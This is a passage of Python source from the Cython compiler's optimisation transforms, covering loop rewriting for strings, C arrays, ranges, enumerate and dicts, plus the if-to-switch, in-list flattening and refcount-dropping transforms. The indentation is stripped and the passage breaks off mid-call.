init_unicode_iteration_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_int_type, [
PyrexTypes.CFuncTypeArg("s", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("length", PyrexTypes.c_py_ssize_t_ptr_type, None),
PyrexTypes.CFuncTypeArg("data", PyrexTypes.c_void_ptr_ptr_type, None),
PyrexTypes.CFuncTypeArg("kind", PyrexTypes.c_int_ptr_type, None)
],
exception_value = '-1')
def _transform_unicode_iteration(self, node, slice_node, reversed=False):
if slice_node.is_literal:
# try to reduce to byte iteration for plain Latin-1 strings
try:
bytes_value = BytesLiteral(slice_node.value.encode('latin1'))
except UnicodeEncodeError:
pass
else:
bytes_slice = ExprNodes.SliceIndexNode(
slice_node.pos,
base=ExprNodes.BytesNode(
slice_node.pos, value=bytes_value,
constant_result=bytes_value,
type=PyrexTypes.c_char_ptr_type).coerce_to(
PyrexTypes.c_uchar_ptr_type, self.current_env()),
start=None,
stop=ExprNodes.IntNode(
slice_node.pos, value=str(len(bytes_value)),
constant_result=len(bytes_value),
type=PyrexTypes.c_py_ssize_t_type),
type=Builtin.unicode_type, # hint for Python conversion
)
return self._transform_carray_iteration(node, bytes_slice, reversed)
unpack_temp_node = UtilNodes.LetRefNode(
slice_node.as_none_safe_node("'NoneType' is not iterable"))
start_node = ExprNodes.IntNode(
node.pos, value='0', constant_result=0, type=PyrexTypes.c_py_ssize_t_type)
length_temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)
end_node = length_temp.ref(node.pos)
if reversed:
relation1, relation2 = '>', '>='
start_node, end_node = end_node, start_node
else:
relation1, relation2 = '<=', '<'
kind_temp = UtilNodes.TempHandle(PyrexTypes.c_int_type)
data_temp = UtilNodes.TempHandle(PyrexTypes.c_void_ptr_type)
counter_temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)
target_value = ExprNodes.PythonCapiCallNode(
slice_node.pos, "__Pyx_PyUnicode_READ",
self.PyUnicode_READ_func_type,
args = [kind_temp.ref(slice_node.pos),
data_temp.ref(slice_node.pos),
counter_temp.ref(node.target.pos)],
is_temp = False,
)
if target_value.type != node.target.type:
target_value = target_value.coerce_to(node.target.type,
self.current_env())
target_assign = Nodes.SingleAssignmentNode(
pos = node.target.pos,
lhs = node.target,
rhs = target_value)
body = Nodes.StatListNode(
node.pos,
stats = [target_assign, node.body])
loop_node = Nodes.ForFromStatNode(
node.pos,
bound1=start_node, relation1=relation1,
target=counter_temp.ref(node.target.pos),
relation2=relation2, bound2=end_node,
step=None, body=body,
else_clause=node.else_clause,
from_range=True)
setup_node = Nodes.ExprStatNode(
node.pos,
expr = ExprNodes.PythonCapiCallNode(
slice_node.pos, "__Pyx_init_unicode_iteration",
self.init_unicode_iteration_func_type,
args = [unpack_temp_node,
ExprNodes.AmpersandNode(slice_node.pos, operand=length_temp.ref(slice_node.pos),
type=PyrexTypes.c_py_ssize_t_ptr_type),
ExprNodes.AmpersandNode(slice_node.pos, operand=data_temp.ref(slice_node.pos),
type=PyrexTypes.c_void_ptr_ptr_type),
ExprNodes.AmpersandNode(slice_node.pos, operand=kind_temp.ref(slice_node.pos),
type=PyrexTypes.c_int_ptr_type),
],
is_temp = True,
result_is_used = False,
utility_code=UtilityCode.load_cached("unicode_iter", "Optimize.c"),
))
return UtilNodes.LetNode(
unpack_temp_node,
UtilNodes.TempsBlockNode(
node.pos, temps=[counter_temp, length_temp, data_temp, kind_temp],
body=Nodes.StatListNode(node.pos, stats=[setup_node, loop_node])))
def _transform_carray_iteration(self, node, slice_node, reversed=False):
neg_step = False
if isinstance(slice_node, ExprNodes.SliceIndexNode):
slice_base = slice_node.base
start = filter_none_node(slice_node.start)
stop = filter_none_node(slice_node.stop)
step = None
if not stop:
if not slice_base.type.is_pyobject:
error(slice_node.pos, "C array iteration requires known end index")
return node
elif isinstance(slice_node, ExprNodes.IndexNode):
assert isinstance(slice_node.index, ExprNodes.SliceNode)
slice_base = slice_node.base
index = slice_node.index
start = filter_none_node(index.start)
stop = filter_none_node(index.stop)
step = filter_none_node(index.step)
if step:
if not isinstance(step.constant_result, (int,long)) \
or step.constant_result == 0 \
or step.constant_result > 0 and not stop \
or step.constant_result < 0 and not start:
if not slice_base.type.is_pyobject:
error(step.pos, "C array iteration requires known step size and end index")
return node
else:
# step sign is handled internally by ForFromStatNode
step_value = step.constant_result
if reversed:
step_value = -step_value
neg_step = step_value < 0
step = ExprNodes.IntNode(step.pos, type=PyrexTypes.c_py_ssize_t_type,
value=str(abs(step_value)),
constant_result=abs(step_value))
elif slice_node.type.is_array:
if slice_node.type.size is None:
error(slice_node.pos, "C array iteration requires known end index")
return node
slice_base = slice_node
start = None
stop = ExprNodes.IntNode(
slice_node.pos, value=str(slice_node.type.size),
type=PyrexTypes.c_py_ssize_t_type, constant_result=slice_node.type.size)
step = None
else:
if not slice_node.type.is_pyobject:
error(slice_node.pos, "C array iteration requires known end index")
return node
if start:
start = start.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
if stop:
stop = stop.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
if stop is None:
if neg_step:
stop = ExprNodes.IntNode(
slice_node.pos, value='-1', type=PyrexTypes.c_py_ssize_t_type, constant_result=-1)
else:
error(slice_node.pos, "C array iteration requires known step size and end index")
return node
if reversed:
if not start:
start = ExprNodes.IntNode(slice_node.pos, value="0", constant_result=0,
type=PyrexTypes.c_py_ssize_t_type)
# if step was provided, it was already negated above
start, stop = stop, start
ptr_type = slice_base.type
if ptr_type.is_array:
ptr_type = ptr_type.element_ptr_type()
carray_ptr = slice_base.coerce_to_simple(self.current_env())
if start and start.constant_result != 0:
start_ptr_node = ExprNodes.AddNode(
start.pos,
operand1=carray_ptr,
operator='+',
operand2=start,
type=ptr_type)
else:
start_ptr_node = carray_ptr
if stop and stop.constant_result != 0:
stop_ptr_node = ExprNodes.AddNode(
stop.pos,
operand1=ExprNodes.CloneNode(carray_ptr),
operator='+',
operand2=stop,
type=ptr_type
).coerce_to_simple(self.current_env())
else:
stop_ptr_node = ExprNodes.CloneNode(carray_ptr)
counter = UtilNodes.TempHandle(ptr_type)
counter_temp = counter.ref(node.target.pos)
if slice_base.type.is_string and node.target.type.is_pyobject:
# special case: char* -> bytes/unicode
if slice_node.type is Builtin.unicode_type:
target_value = ExprNodes.CastNode(
ExprNodes.DereferenceNode(
node.target.pos, operand=counter_temp,
type=ptr_type.base_type),
PyrexTypes.c_py_ucs4_type).coerce_to(
node.target.type, self.current_env())
else:
# char* -> bytes coercion requires slicing, not indexing
target_value = ExprNodes.SliceIndexNode(
node.target.pos,
start=ExprNodes.IntNode(node.target.pos, value='0',
constant_result=0,
type=PyrexTypes.c_int_type),
stop=ExprNodes.IntNode(node.target.pos, value='1',
constant_result=1,
type=PyrexTypes.c_int_type),
base=counter_temp,
type=Builtin.bytes_type,
is_temp=1)
elif node.target.type.is_ptr and not node.target.type.assignable_from(ptr_type.base_type):
# Allow iteration with pointer target to avoid copy.
target_value = counter_temp
else:
# TODO: can this safely be replaced with DereferenceNode() as above?
target_value = ExprNodes.IndexNode(
node.target.pos,
index=ExprNodes.IntNode(node.target.pos, value='0',
constant_result=0,
type=PyrexTypes.c_int_type),
base=counter_temp,
is_buffer_access=False,
type=ptr_type.base_type)
if target_value.type != node.target.type:
target_value = target_value.coerce_to(node.target.type,
self.current_env())
target_assign = Nodes.SingleAssignmentNode(
pos = node.target.pos,
lhs = node.target,
rhs = target_value)
body = Nodes.StatListNode(
node.pos,
stats = [target_assign, node.body])
relation1, relation2 = self._find_for_from_node_relations(neg_step, reversed)
for_node = Nodes.ForFromStatNode(
node.pos,
bound1=start_ptr_node, relation1=relation1,
target=counter_temp,
relation2=relation2, bound2=stop_ptr_node,
step=step, body=body,
else_clause=node.else_clause,
from_range=True)
return UtilNodes.TempsBlockNode(
node.pos, temps=[counter],
body=for_node)
def _transform_enumerate_iteration(self, node, enumerate_function):
args = enumerate_function.arg_tuple.args
if len(args) == 0:
error(enumerate_function.pos,
"enumerate() requires an iterable argument")
return node
elif len(args) > 2:
error(enumerate_function.pos,
"enumerate() takes at most 2 arguments")
return node
if not node.target.is_sequence_constructor:
# leave this untouched for now
return node
targets = node.target.args
if len(targets) != 2:
# leave this untouched for now
return node
enumerate_target, iterable_target = targets
counter_type = enumerate_target.type
if not counter_type.is_pyobject and not counter_type.is_int:
# nothing we can do here, I guess
return node
if len(args) == 2:
start = unwrap_coerced_node(args[1]).coerce_to(counter_type, self.current_env())
else:
start = ExprNodes.IntNode(enumerate_function.pos,
value='0',
type=counter_type,
constant_result=0)
temp = UtilNodes.LetRefNode(start)
inc_expression = ExprNodes.AddNode(
enumerate_function.pos,
operand1 = temp,
operand2 = ExprNodes.IntNode(node.pos, value='1',
type=counter_type,
constant_result=1),
operator = '+',
type = counter_type,
#inplace = True, # not worth using in-place operation for Py ints
is_temp = counter_type.is_pyobject
)
loop_body = [
Nodes.SingleAssignmentNode(
pos = enumerate_target.pos,
lhs = enumerate_target,
rhs = temp),
Nodes.SingleAssignmentNode(
pos = enumerate_target.pos,
lhs = temp,
rhs = inc_expression)
]
if isinstance(node.body, Nodes.StatListNode):
node.body.stats = loop_body + node.body.stats
else:
loop_body.append(node.body)
node.body = Nodes.StatListNode(
node.body.pos,
stats = loop_body)
node.target = iterable_target
node.item = node.item.coerce_to(iterable_target.type, self.current_env())
node.iterator.sequence = args[0]
# recurse into loop to check for further optimisations
return UtilNodes.LetNode(temp, self._optimise_for_loop(node, node.iterator.sequence))
def _find_for_from_node_relations(self, neg_step_value, reversed):
if reversed:
if neg_step_value:
return '<', '<='
else:
return '>', '>='
else:
if neg_step_value:
return '>=', '>'
else:
return '<=', '<'
def _transform_range_iteration(self, node, range_function, reversed=False):
args = range_function.arg_tuple.args
if len(args) < 3:
step_pos = range_function.pos
step_value = 1
step = ExprNodes.IntNode(step_pos, value='1', constant_result=1)
else:
step = args[2]
step_pos = step.pos
if not isinstance(step.constant_result, (int, long)):
# cannot determine step direction
return node
step_value = step.constant_result
if step_value == 0:
# will lead to an error elsewhere
return node
step = ExprNodes.IntNode(step_pos, value=str(step_value),
constant_result=step_value)
if len(args) == 1:
bound1 = ExprNodes.IntNode(range_function.pos, value='0',
constant_result=0)
bound2 = args[0].coerce_to_integer(self.current_env())
else:
bound1 = args[0].coerce_to_integer(self.current_env())
bound2 = args[1].coerce_to_integer(self.current_env())
relation1, relation2 = self._find_for_from_node_relations(step_value < 0, reversed)
bound2_ref_node = None
if reversed:
bound1, bound2 = bound2, bound1
abs_step = abs(step_value)
if abs_step != 1:
if (isinstance(bound1.constant_result, (int, long)) and
isinstance(bound2.constant_result, (int, long))):
# calculate final bounds now
if step_value < 0:
begin_value = bound2.constant_result
end_value = bound1.constant_result
bound1_value = begin_value - abs_step * ((begin_value - end_value - 1) // abs_step) - 1
else:
begin_value = bound1.constant_result
end_value = bound2.constant_result
bound1_value = end_value + abs_step * ((begin_value - end_value - 1) // abs_step) + 1
bound1 = ExprNodes.IntNode(
bound1.pos, value=str(bound1_value), constant_result=bound1_value,
type=PyrexTypes.spanning_type(bound1.type, bound2.type))
else:
# evaluate the same expression as above at runtime
bound2_ref_node = UtilNodes.LetRefNode(bound2)
spanning_type = PyrexTypes.spanning_type(bound1.type, bound2.type)
spanning_step_type = PyrexTypes.spanning_type(spanning_type, step.type)
if step_value < 0:
begin_value = bound2_ref_node
end_value = bound1
final_op = '-'
else:
begin_value = bound1
end_value = bound2_ref_node
final_op = '+'
bound1 = ExprNodes.binop_node(
bound1.pos,
operand1=ExprNodes.binop_node(
bound1.pos,
operand1=bound2_ref_node,
operator=final_op, # +/-
operand2=ExprNodes.MulNode(
bound1.pos,
operand1=ExprNodes.IntNode(
bound1.pos,
value=str(abs_step),
constant_value=abs_step,
type=spanning_step_type),
operator='*',
operand2=ExprNodes.DivNode(
bound1.pos,
operand1=ExprNodes.SubNode(
bound1.pos,
operand1=ExprNodes.SubNode(
bound1.pos,
operand1=begin_value,
operator='-',
operand2=end_value,
type=spanning_type),
operator='-',
operand2=ExprNodes.IntNode(
bound1.pos,
value='1',
constant_result=1),
type=spanning_step_type),
operator='//',
operand2=ExprNodes.IntNode(
bound1.pos,
value=str(abs_step),
constant_value=abs_step,
type=spanning_step_type),
type=spanning_step_type),
type=spanning_step_type),
type=spanning_step_type),
operator=final_op, # +/-
operand2=ExprNodes.IntNode(
bound1.pos,
value='1',
constant_result=1),
type=spanning_type)
if step_value < 0:
step_value = -step_value
step.value = str(step_value)
step.constant_result = step_value
step = step.coerce_to_integer(self.current_env())
if not bound2.is_literal:
# stop bound must be immutable => keep it in a temp var
bound2_is_temp = True
bound2 = bound2_ref_node or UtilNodes.LetRefNode(bound2)
else:
bound2_is_temp = False
for_node = Nodes.ForFromStatNode(
node.pos,
target=node.target,
bound1=bound1, relation1=relation1,
relation2=relation2, bound2=bound2,
step=step, body=node.body,
else_clause=node.else_clause,
from_range=True)
if bound2_is_temp:
for_node = UtilNodes.LetNode(bound2, for_node)
return for_node
def _transform_dict_iteration(self, node, dict_obj, method, keys, values):
temps = []
temp = UtilNodes.TempHandle(PyrexTypes.py_object_type)
temps.append(temp)
dict_temp = temp.ref(dict_obj.pos)
temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)
temps.append(temp)
pos_temp = temp.ref(node.pos)
key_target = value_target = tuple_target = None
if keys and values:
if node.target.is_sequence_constructor:
if len(node.target.args) == 2:
key_target, value_target = node.target.args
else:
# unusual case that may or may not lead to an error
return node
else:
tuple_target = node.target
elif keys:
key_target = node.target
else:
value_target = node.target
if isinstance(node.body, Nodes.StatListNode):
body = node.body
else:
body = Nodes.StatListNode(pos = node.body.pos,
stats = [node.body])
# keep original length to guard against dict modification
dict_len_temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)
temps.append(dict_len_temp)
dict_len_temp_addr = ExprNodes.AmpersandNode(
node.pos, operand=dict_len_temp.ref(dict_obj.pos),
type=PyrexTypes.c_ptr_type(dict_len_temp.type))
temp = UtilNodes.TempHandle(PyrexTypes.c_int_type)
temps.append(temp)
is_dict_temp = temp.ref(node.pos)
is_dict_temp_addr = ExprNodes.AmpersandNode(
node.pos, operand=is_dict_temp,
type=PyrexTypes.c_ptr_type(temp.type))
iter_next_node = Nodes.DictIterationNextNode(
dict_temp, dict_len_temp.ref(dict_obj.pos), pos_temp,
key_target, value_target, tuple_target,
is_dict_temp)
iter_next_node = iter_next_node.analyse_expressions(self.current_env())
body.stats[0:0] = [iter_next_node]
if method:
method_node = ExprNodes.StringNode(
dict_obj.pos, is_identifier=True, value=method)
dict_obj = dict_obj.as_none_safe_node(
"'NoneType' object has no attribute '%s'",
error = "PyExc_AttributeError",
format_args = [method])
else:
method_node = ExprNodes.NullNode(dict_obj.pos)
dict_obj = dict_obj.as_none_safe_node("'NoneType' object is not iterable")
def flag_node(value):
value = value and 1 or 0
return ExprNodes.IntNode(node.pos, value=str(value), constant_result=value)
result_code = [
Nodes.SingleAssignmentNode(
node.pos,
lhs = pos_temp,
rhs = ExprNodes.IntNode(node.pos, value='0',
constant_result=0)),
Nodes.SingleAssignmentNode(
dict_obj.pos,
lhs = dict_temp,
rhs = ExprNodes.PythonCapiCallNode(
dict_obj.pos,
"__Pyx_dict_iterator",
self.PyDict_Iterator_func_type,
utility_code = UtilityCode.load_cached("dict_iter", "Optimize.c"),
args = [dict_obj, flag_node(dict_obj.type is Builtin.dict_type),
method_node, dict_len_temp_addr, is_dict_temp_addr,
],
is_temp=True,
)),
Nodes.WhileStatNode(
node.pos,
condition = None,
body = body,
else_clause = node.else_clause
)
]
return UtilNodes.TempsBlockNode(
node.pos, temps=temps,
body=Nodes.StatListNode(
node.pos,
stats = result_code
))
PyDict_Iterator_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("dict", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("is_dict", PyrexTypes.c_int_type, None),
PyrexTypes.CFuncTypeArg("method_name", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("p_orig_length", PyrexTypes.c_py_ssize_t_ptr_type, None),
PyrexTypes.CFuncTypeArg("p_is_dict", PyrexTypes.c_int_ptr_type, None),
])
class SwitchTransform(Visitor.EnvTransform):
"""
This transformation tries to turn long if statements into C switch statements.
The requirement is that every clause be an (or of) var == value, where the var
is common among all clauses and both var and value are ints.
"""
NO_MATCH = (None, None, None)
def extract_conditions(self, cond, allow_not_in):
while True:
if isinstance(cond, (ExprNodes.CoerceToTempNode,
ExprNodes.CoerceToBooleanNode)):
cond = cond.arg
elif isinstance(cond, ExprNodes.BoolBinopResultNode):
cond = cond.arg.arg
elif isinstance(cond, UtilNodes.EvalWithTempExprNode):
# this is what we get from the FlattenInListTransform
cond = cond.subexpression
elif isinstance(cond, ExprNodes.TypecastNode):
cond = cond.operand
else:
break
if isinstance(cond, ExprNodes.PrimaryCmpNode):
if cond.cascade is not None:
return self.NO_MATCH
elif cond.is_c_string_contains() and \
isinstance(cond.operand2, (ExprNodes.UnicodeNode, ExprNodes.BytesNode)):
not_in = cond.operator == 'not_in'
if not_in and not allow_not_in:
return self.NO_MATCH
if isinstance(cond.operand2, ExprNodes.UnicodeNode) and \
cond.operand2.contains_surrogates():
# dealing with surrogates leads to different
# behaviour on wide and narrow Unicode
# platforms => refuse to optimise this case
return self.NO_MATCH
return not_in, cond.operand1, self.extract_in_string_conditions(cond.operand2)
elif not cond.is_python_comparison():
if cond.operator == '==':
not_in = False
elif allow_not_in and cond.operator == '!=':
not_in = True
else:
return self.NO_MATCH
# this looks somewhat silly, but it does the right
# checks for NameNode and AttributeNode
if is_common_value(cond.operand1, cond.operand1):
if cond.operand2.is_literal:
return not_in, cond.operand1, [cond.operand2]
elif getattr(cond.operand2, 'entry', None) \
and cond.operand2.entry.is_const:
return not_in, cond.operand1, [cond.operand2]
if is_common_value(cond.operand2, cond.operand2):
if cond.operand1.is_literal:
return not_in, cond.operand2, [cond.operand1]
elif getattr(cond.operand1, 'entry', None) \
and cond.operand1.entry.is_const:
return not_in, cond.operand2, [cond.operand1]
elif isinstance(cond, ExprNodes.BoolBinopNode):
if cond.operator == 'or' or (allow_not_in and cond.operator == 'and'):
allow_not_in = (cond.operator == 'and')
not_in_1, t1, c1 = self.extract_conditions(cond.operand1, allow_not_in)
not_in_2, t2, c2 = self.extract_conditions(cond.operand2, allow_not_in)
if t1 is not None and not_in_1 == not_in_2 and is_common_value(t1, t2):
if (not not_in_1) or allow_not_in:
return not_in_1, t1, c1+c2
return self.NO_MATCH
def extract_in_string_conditions(self, string_literal):
if isinstance(string_literal, ExprNodes.UnicodeNode):
charvals = list(map(ord, set(string_literal.value)))
charvals.sort()
return [ ExprNodes.IntNode(string_literal.pos, value=str(charval),
constant_result=charval)
for charval in charvals ]
else:
# this is a bit tricky as Py3's bytes type returns
# integers on iteration, whereas Py2 returns 1-char byte
# strings
characters = string_literal.value
characters = list(set([ characters[i:i+1] for i in range(len(characters)) ]))
characters.sort()
return [ ExprNodes.CharNode(string_literal.pos, value=charval,
constant_result=charval)
for charval in characters ]
def extract_common_conditions(self, common_var, condition, allow_not_in):
not_in, var, conditions = self.extract_conditions(condition, allow_not_in)
if var is None:
return self.NO_MATCH
elif common_var is not None and not is_common_value(var, common_var):
return self.NO_MATCH
elif not (var.type.is_int or var.type.is_enum) or sum([not (cond.type.is_int or cond.type.is_enum) for cond in conditions]):
return self.NO_MATCH
return not_in, var, conditions
def has_duplicate_values(self, condition_values):
# duplicated values don't work in a switch statement
seen = set()
for value in condition_values:
if value.has_constant_result():
if value.constant_result in seen:
return True
seen.add(value.constant_result)
else:
# this isn't completely safe as we don't know the
# final C value, but this is about the best we can do
try:
if value.entry.cname in seen:
return True
except AttributeError:
return True # play safe
seen.add(value.entry.cname)
return False
def visit_IfStatNode(self, node):
if not self.current_directives.get('optimize.use_switch'):
self.visitchildren(node)
return node
common_var = None
cases = []
for if_clause in node.if_clauses:
_, common_var, conditions = self.extract_common_conditions(
common_var, if_clause.condition, False)
if common_var is None:
self.visitchildren(node)
return node
cases.append(Nodes.SwitchCaseNode(pos = if_clause.pos,
conditions = conditions,
body = if_clause.body))
condition_values = [
cond for case in cases for cond in case.conditions]
if len(condition_values) < 2:
self.visitchildren(node)
return node
if self.has_duplicate_values(condition_values):
self.visitchildren(node)
return node
common_var = unwrap_node(common_var)
switch_node = Nodes.SwitchStatNode(pos = node.pos,
test = common_var,
cases = cases,
else_clause = node.else_clause)
return switch_node
def visit_CondExprNode(self, node):
if not self.current_directives.get('optimize.use_switch'):
self.visitchildren(node)
return node
not_in, common_var, conditions = self.extract_common_conditions(
None, node.test, True)
if common_var is None \
or len(conditions) < 2 \
or self.has_duplicate_values(conditions):
self.visitchildren(node)
return node
return self.build_simple_switch_statement(
node, common_var, conditions, not_in,
node.true_val, node.false_val)
def visit_BoolBinopNode(self, node):
if not self.current_directives.get('optimize.use_switch'):
self.visitchildren(node)
return node
not_in, common_var, conditions = self.extract_common_conditions(
None, node, True)
if common_var is None \
or len(conditions) < 2 \
or self.has_duplicate_values(conditions):
self.visitchildren(node)
node.wrap_operands(self.current_env()) # in case we changed the operands
return node
return self.build_simple_switch_statement(
node, common_var, conditions, not_in,
ExprNodes.BoolNode(node.pos, value=True, constant_result=True),
ExprNodes.BoolNode(node.pos, value=False, constant_result=False))
def visit_PrimaryCmpNode(self, node):
if not self.current_directives.get('optimize.use_switch'):
self.visitchildren(node)
return node
not_in, common_var, conditions = self.extract_common_conditions(
None, node, True)
if common_var is None \
or len(conditions) < 2 \
or self.has_duplicate_values(conditions):
self.visitchildren(node)
return node
return self.build_simple_switch_statement(
node, common_var, conditions, not_in,
ExprNodes.BoolNode(node.pos, value=True, constant_result=True),
ExprNodes.BoolNode(node.pos, value=False, constant_result=False))
def build_simple_switch_statement(self, node, common_var, conditions,
not_in, true_val, false_val):
result_ref = UtilNodes.ResultRefNode(node)
true_body = Nodes.SingleAssignmentNode(
node.pos,
lhs=result_ref,
rhs=true_val.coerce_to(node.type, self.current_env()),
first=True)
false_body = Nodes.SingleAssignmentNode(
node.pos,
lhs=result_ref,
rhs=false_val.coerce_to(node.type, self.current_env()),
first=True)
if not_in:
true_body, false_body = false_body, true_body
cases = [Nodes.SwitchCaseNode(pos = node.pos,
conditions = conditions,
body = true_body)]
common_var = unwrap_node(common_var)
switch_node = Nodes.SwitchStatNode(pos = node.pos,
test = common_var,
cases = cases,
else_clause = false_body)
replacement = UtilNodes.TempResultFromStatNode(result_ref, switch_node)
return replacement
def visit_EvalWithTempExprNode(self, node):
if not self.current_directives.get('optimize.use_switch'):
self.visitchildren(node)
return node
# drop unused expression temp from FlattenInListTransform
orig_expr = node.subexpression
temp_ref = node.lazy_temp
self.visitchildren(node)
if node.subexpression is not orig_expr:
# node was restructured => check if temp is still used
if not Visitor.tree_contains(node.subexpression, temp_ref):
return node.subexpression
return node
visit_Node = Visitor.VisitorTransform.recurse_to_children
class FlattenInListTransform(Visitor.VisitorTransform, SkipDeclarations):
"""
This transformation flattens "x in [val1, ..., valn]" into a sequential list
of comparisons.
"""
def visit_PrimaryCmpNode(self, node):
self.visitchildren(node)
if node.cascade is not None:
return node
elif node.operator == 'in':
conjunction = 'or'
eq_or_neq = '=='
elif node.operator == 'not_in':
conjunction = 'and'
eq_or_neq = '!='
else:
return node
if not isinstance(node.operand2, (ExprNodes.TupleNode,
ExprNodes.ListNode,
ExprNodes.SetNode)):
return node
args = node.operand2.args
if len(args) == 0:
# note: lhs may have side effects
return node
lhs = UtilNodes.ResultRefNode(node.operand1)
conds = []
temps = []
for arg in args:
try:
# Trial optimisation to avoid redundant temp
# assignments. However, since is_simple() is meant to
# be called after type analysis, we ignore any errors
# and just play safe in that case.
is_simple_arg = arg.is_simple()
except Exception:
is_simple_arg = False
if not is_simple_arg:
# must evaluate all non-simple RHS before doing the comparisons
arg = UtilNodes.LetRefNode(arg)
temps.append(arg)
cond = ExprNodes.PrimaryCmpNode(
pos = node.pos,
operand1 = lhs,
operator = eq_or_neq,
operand2 = arg,
cascade = None)
conds.append(ExprNodes.TypecastNode(
pos = node.pos,
operand = cond,
type = PyrexTypes.c_bint_type))
def concat(left, right):
return ExprNodes.BoolBinopNode(
pos = node.pos,
operator = conjunction,
operand1 = left,
operand2 = right)
condition = reduce(concat, conds)
new_node = UtilNodes.EvalWithTempExprNode(lhs, condition)
for temp in temps[::-1]:
new_node = UtilNodes.EvalWithTempExprNode(temp, new_node)
return new_node
visit_Node = Visitor.VisitorTransform.recurse_to_children
class DropRefcountingTransform(Visitor.VisitorTransform):
"""Drop ref-counting in safe places.
"""
visit_Node = Visitor.VisitorTransform.recurse_to_children
def visit_ParallelAssignmentNode(self, node):
"""
Parallel swap assignments like 'a,b = b,a' are safe.
"""
left_names, right_names = [], []
left_indices, right_indices = [], []
temps = []
for stat in node.stats:
if isinstance(stat, Nodes.SingleAssignmentNode):
if not self._extract_operand(stat.lhs, left_names,
left_indices, temps):
return node
if not self._extract_operand(stat.rhs, right_names,
right_indices, temps):
return node
elif isinstance(stat, Nodes.CascadedAssignmentNode):
# FIXME
return node
else:
return node
if left_names or right_names:
# lhs/rhs names must be a non-redundant permutation
lnames = [ path for path, n in left_names ]
rnames = [ path for path, n in right_names ]
if set(lnames) != set(rnames):
return node
if len(set(lnames)) != len(right_names):
return node
if left_indices or right_indices:
# base name and index of index nodes must be a
# non-redundant permutation
lindices = []
for lhs_node in left_indices:
index_id = self._extract_index_id(lhs_node)
if not index_id:
return node
lindices.append(index_id)
rindices = []
for rhs_node in right_indices:
index_id = self._extract_index_id(rhs_node)
if not index_id:
return node
rindices.append(index_id)
if set(lindices) != set(rindices):
return node
if len(set(lindices)) != len(right_indices):
return node
# really supporting IndexNode requires support in
# __Pyx_GetItemInt(), so let's stop short for now
return node
temp_args = [t.arg for t in temps]
for temp in temps:
temp.use_managed_ref = False
for _, name_node in left_names + right_names:
if name_node not in temp_args:
name_node.use_managed_ref = False
for index_node in left_indices + right_indices:
index_node.use_managed_ref = False
return node
def _extract_operand(self, node, names, indices, temps):
node = unwrap_node(node)
if not node.type.is_pyobject:
return False
if isinstance(node, ExprNodes.CoerceToTempNode):
temps.append(node)
node = node.arg
name_path = []
obj_node = node
while isinstance(obj_node, ExprNodes.AttributeNode):
if obj_node.is_py_attr:
return False
name_path.append(obj_node.member)
obj_node = obj_node.obj
if isinstance(obj_node, ExprNodes.NameNode):
name_path.append(obj_node.name)
names.append( ('.'.join(name_path[::-1]), node) )
elif isinstance(node, ExprNodes.IndexNode):
if node.base.type != Builtin.list_type:
return False
if not node.index.type.is_int:
return False
if not isinstance(node.base, ExprNodes.NameNode):
return False
indices.append(node)
else:
return False
return True
def _extract_index_id(self, index_node):
base = index_node.base
index = index_node.index
if isinstance(index, ExprNodes.NameNode):
index_val = index.name
elif isinstance(index, ExprNodes.ConstNode):
# FIXME:
return None
else:
return None
return (base.name, index_val)
class EarlyReplaceBuiltinCalls(Visitor.EnvTransform):
"""Optimize some common calls to builtin types *before* the type
analysis phase and *after* the declarations analysis phase.
This transform cannot make use of any argument types, but it can
restructure the tree in a way that the type analysis phase can
respond to.
Introducing C function calls here may not be a good idea. Move
them to the OptimizeBuiltinCalls transform instead, which runs
after type analysis.
"""
# only intercept on call nodes
visit_Node = Visitor.VisitorTransform.recurse_to_children
def visit_SimpleCallNode(self, node):
self.visitchildren(node)
function = node.function
if not self._function_is_builtin_name(function):
return node
return self._dispatch_to_handler(node, function, node.args)
def visit_GeneralCallNode(self, node):
self.visitchildren(node)
function = node.function
if not self._function_is_builtin_name(function):
return node
arg_tuple = node.positional_args
if not isinstance(arg_tuple, ExprNodes.TupleNode):
return node
args = arg_tuple.args
return self._dispatch_to_handler(
node, function, args, node.keyword_args)
def _function_is_builtin_name(self, function):
if not function.is_name:
return False
env = self.current_env()
entry = env.lookup(function.name)
if entry is not env.builtin_scope().lookup_here(function.name):
return False
# if entry is None, it's at least an undeclared name, so likely builtin
return True
def _dispatch_to_handler(self, node, function, args, kwargs=None):
if kwargs is None:
handler_name = '_handle_simple_function_%s' % function.name
else:
handler_name = '_handle_general_function_%s' % function.name
handle_call = getattr(self, handler_name, None)
if handle_call is not None:
if kwargs is None:
return handle_call(node, args)
else:
return handle_call(node, args, kwargs)
return node
def _inject_capi_function(self, node, cname, func_type, utility_code=None):
node.function = ExprNodes.PythonCapiFunctionNode(
node.function.pos, node.function.name, cname, func_type,
utility_code = utility_code)
def _error_wrong_arg_count(self, function_name, node, args, expected=None):
if not expected: # None or 0
arg_str = ''
elif isinstance(expected, basestring) or expected > 1:
arg_str = '...'
elif expected == 1:
arg_str = 'x'
else:
arg_str = ''
if expected is not None:
expected_str = 'expected %s, ' % expected
else:
expected_str = ''
error(node.pos, "%s(%s) called with wrong number of args, %sfound %d" % (
function_name, arg_str, expected_str, len(args)))
# specific handlers for simple call nodes
def _handle_simple_function_float(self, node, pos_args):
if not pos_args:
return ExprNodes.FloatNode(node.pos, value='0.0')
if len(pos_args) > 1:
self._error_wrong_arg_count('float', node, pos_args, 1)
arg_type = getattr(pos_args[0], 'type', None)
if arg_type in (PyrexTypes.c_double_type, Builtin.float_type):
return pos_args[0]
return node
def _handle_simple_function_slice(self, node, pos_args):
arg_count = len(pos_args)
start = step = None
if arg_count == 1:
stop, = pos_args
elif arg_count == 2:
start, stop = pos_args
elif arg_count == 3:
start, stop, step = pos_args
else:
self._error_wrong_arg_count('slice', node, pos_args)
return node
return ExprNodes.SliceNode(
node.pos,
start=start or ExprNodes.NoneNode(node.pos),
stop=stop,
